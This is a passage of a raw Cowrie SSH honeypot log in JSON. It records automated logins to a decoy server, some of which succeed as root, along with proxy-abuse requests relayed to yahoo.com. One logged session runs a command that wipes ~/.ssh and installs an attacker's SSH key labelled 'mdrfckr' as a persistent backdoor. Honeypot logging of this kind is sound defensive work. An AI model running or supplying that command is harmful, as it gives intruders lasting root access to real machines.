57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.299969Z","src_ip":"213.209.150.239","session":"23c4364a3ecf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.308485Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.534518Z","src_ip":"213.209.150.239","session":"23c4364a3ecf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18122,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18122","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.582477Z","session":"23c4364a3ecf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.630306Z","src_ip":"213.209.150.239","session":"23c4364a3ecf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4391,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4391","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.765539Z","session":"23c4364a3ecf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.812630Z","src_ip":"213.209.150.239","session":"23c4364a3ecf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:59:24.840370Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.841077Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.860186Z","src_ip":"213.209.150.239","session":"23c4364a3ecf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4286,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2dfe2aef813","protocol":"ssh","message":"New connection: 213.209.150.239:4286 (1.2.3.4:22) [session: f2dfe2aef813]","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.915946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.916761Z","src_ip":"213.209.150.239","session":"f2dfe2aef813"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.973356Z","src_ip":"213.209.150.239","session":"f2dfe2aef813"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.100647Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.101551Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.255838Z","src_ip":"213.209.150.239","session":"f2dfe2aef813"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31683,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31683","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.314084Z","session":"f2dfe2aef813"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.370680Z","src_ip":"213.209.150.239","session":"f2dfe2aef813"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":54136,"dst_ip":"1.2.3.4","dst_port":22,"session":"41d07417cc21","protocol":"ssh","message":"New connection: 27.112.78.170:54136 (1.2.3.4:22) [session: 41d07417cc21]","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.414501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.415105Z","src_ip":"27.112.78.170","session":"41d07417cc21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":10169,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10169","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.527001Z","session":"f2dfe2aef813"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.583807Z","src_ip":"213.209.150.239","session":"f2dfe2aef813"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.641179Z","src_ip":"213.209.150.239","session":"f2dfe2aef813"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.682279Z","src_ip":"27.112.78.170","session":"41d07417cc21"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4343,"dst_ip":"1.2.3.4","dst_port":22,"session":"493d098ee1a0","protocol":"ssh","message":"New connection: 213.209.150.239:4343 (1.2.3.4:22) [session: 493d098ee1a0]","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.696660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.697549Z","src_ip":"213.209.150.239","session":"493d098ee1a0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:25.754054Z","src_ip":"213.209.150.239","session":"493d098ee1a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.035651Z","src_ip":"213.209.150.239","session":"493d098ee1a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":23603,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:23603","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.093086Z","session":"493d098ee1a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.149645Z","src_ip":"213.209.150.239","session":"493d098ee1a0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":16515,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16515","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.303005Z","session":"493d098ee1a0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.359696Z","src_ip":"213.209.150.239","session":"493d098ee1a0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.417455Z","src_ip":"213.209.150.239","session":"493d098ee1a0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4392,"dst_ip":"1.2.3.4","dst_port":22,"session":"3905b0f3074d","protocol":"ssh","message":"New connection: 213.209.150.239:4392 (1.2.3.4:22) [session: 3905b0f3074d]","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.473256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.474183Z","src_ip":"213.209.150.239","session":"3905b0f3074d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.530625Z","src_ip":"213.209.150.239","session":"3905b0f3074d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.787348Z","src_ip":"27.112.78.170","session":"41d07417cc21"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.813225Z","src_ip":"213.209.150.239","session":"3905b0f3074d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":13307,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13307","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.870958Z","session":"3905b0f3074d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:26.927977Z","src_ip":"213.209.150.239","session":"3905b0f3074d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":6543,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6543","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.083178Z","session":"3905b0f3074d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.140209Z","src_ip":"213.209.150.239","session":"3905b0f3074d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.198402Z","src_ip":"213.209.150.239","session":"3905b0f3074d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4430,"dst_ip":"1.2.3.4","dst_port":22,"session":"34f1385696ea","protocol":"ssh","message":"New connection: 213.209.150.239:4430 (1.2.3.4:22) [session: 34f1385696ea]","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.244821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.245571Z","src_ip":"213.209.150.239","session":"34f1385696ea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.292974Z","src_ip":"213.209.150.239","session":"34f1385696ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.527475Z","src_ip":"213.209.150.239","session":"34f1385696ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":23944,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23944","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.575564Z","session":"34f1385696ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.622800Z","src_ip":"213.209.150.239","session":"34f1385696ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":28114,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28114","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.757512Z","session":"34f1385696ea"}
